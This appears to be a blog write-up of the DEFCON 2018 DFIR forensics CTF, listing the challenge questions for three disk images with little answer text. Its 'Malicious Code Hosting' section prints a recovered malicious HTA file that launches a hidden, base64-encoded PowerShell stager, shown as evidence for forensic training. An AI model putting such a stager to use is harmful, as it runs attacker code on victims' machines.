DEFCON DFIR CTF 2018 — Lessons Learned

Primer + Proof of Completion:

Low Effort MS Paint skillz. Yep I’m hightail

Introduction

Challenge Format

  1. HR Server (Image 1)
  2. File Server (Image 2)
  3. Desktop (Image 3)
  1. HR Server — Basic
  2. HR Server — Advanced
  3. HR Server — Expert
  4. File Server — Basic
  5. File Server — Advanced
  6. File Server — Expert
  7. Desktop — Basic
  8. Desktop — Advanced
  9. Desktop — Expert

HR Server (Image 1)

Basic

> HR Server — Acquisition Software (2 points)

> HR Server — Acquisition Software Version (2 points)

> HR Server — Entry Name (2 points)

> HR Server — Entry Number (2 points)

> HR Server — Attribute ID (2 points)

> HR Server — SMB (2 points)

  1. Event ID 551 (SMB Session Authentication Failure)
  2. Starts at 2018–08–09 02:10:38
  3. Ends at 2018–08–09 02:10:39

> HR Server — Saved (2 points)

> HR Server — Application Q1 (2 points)

> HR Server — Application Q2 (2 points)

> HR Server — Changes Q1 (2 points)

> HR Server — Changes Q1 (2 points)

$UsnJrnl:$J Results
$Logfile results

Advanced

> HR Server — Logon (4 points)

Bingo

> HR Server — Task Started (4 points)

> HR Server — HR System 1 (4 points)

> HR Server — Web App (4 points)

> HR Server — Changes Q3 (4 points)

Expert

> HR Server — Web Traffic Q1 (8 points)

> HR Server — Web Traffic Q2 (8 points)

File Server

Basic

> File Server — Basic 1 (2 points)

> File Server — Basic 2 (2 points)

ewfinfo
FTK

> File Server — Basic 3 (2 points)

> File Server — Basic 4 (2 points)

> File Server — Basic 5 (2 points)

> File Server — Basic 6 (2 points)

> File Server — Basic 7 (2 points)

> File Server — Basic 8 (2 points)

> File Server — Basic 9 (2 points)

> File Server — Basic 10 (2 points)

Advanced

> File Server — Advanced 1 (4 points)

> File Server — Advanced 2 (4 points)

> File Server — Advanced 3 (4 points)

Get-WinEvent -FilterHashtable @{Path=”.\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx”; ID=21} | Where-Object -Property Message -match ‘mpowers’ | fl | more

> File Server — Advanced 4 (4 points)

> File Server — Advanced 5 (4 points)

> File Server — Advanced 6 (4 points)

> File Server — Advanced 7 (4 points)

Jigsaw puzzle skillz ftw

> File Server — Advanced 8 (4 points)

SAM + SYSTEM?

> File Server — Advanced 9 (4 points)

> File Server — Advanced 10 (4 points)

Expert

> File Server — Expert 1 (8 points)

> File Server — Expert 2 (8 points)

> File Server — Expert 3 (8 points)

> File Server — Expert 4 (8 points)

Desktop

Basic

> Desktop — Basic 1 (2 points)

> Desktop — Basic 2 (2 points)

> Desktop — Basic 3 (2 points)

> Desktop — Basic 4 (2 points)

> Desktop — Basic 5 (2 points)

SAM + SYSTEM?

> Desktop — Basic 6 (2 points)

> Desktop — Basic 7 (2 points)

> Desktop — Basic 8 (2 points)

Advanced

> Desktop — Advanced 1 (4 points)

> Desktop — Advanced 2 (4 points)

> Desktop — Advanced 3 (4 points)

> Desktop — Advanced 4 (4 points)

> Desktop — Advanced 5 (4 points)

> Desktop — Advanced 6 (4 points)

> Desktop — Advanced 7 (4 points)

> Desktop — Advanced 8 (4 points)

> Desktop — Advanced 9 (4 points)

Expert

> Desktop — Malicious Code Hosting (8 points)

$ cat out.hta
<html><head><script>var c= 'powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAFIAcwBJAE8AbgBUAGEAQgBsAEUALgBQAFMAVgBFAFIAcw
...JABEAGEAdABhAC4AbABlAG4AZwBUAEgAXQA7AC0AagBPAEkATgBbAEMASABhAHIAWwBdAF0AKAAmACAAJABSACAAJABkAEEAdABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA='
new ActiveXObject('WScript.Shell').Run(c);</script></head><body><script>self.close();</script></body></html>

> Desktop — Expert 2 (8 points)

> Desktop — Expert 3 (8 points)

  • malware
  • backdoor
  • dropper
  • hta
  • etc.

Final Thoughts

Internet noob.

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Mon

Mon

Internet noob.

More from Medium

Security Invariants or GTFO

Undefeatable Monster

How to install Security Onion on OCI

How would Zero Trust prevent a Log4Shell attack?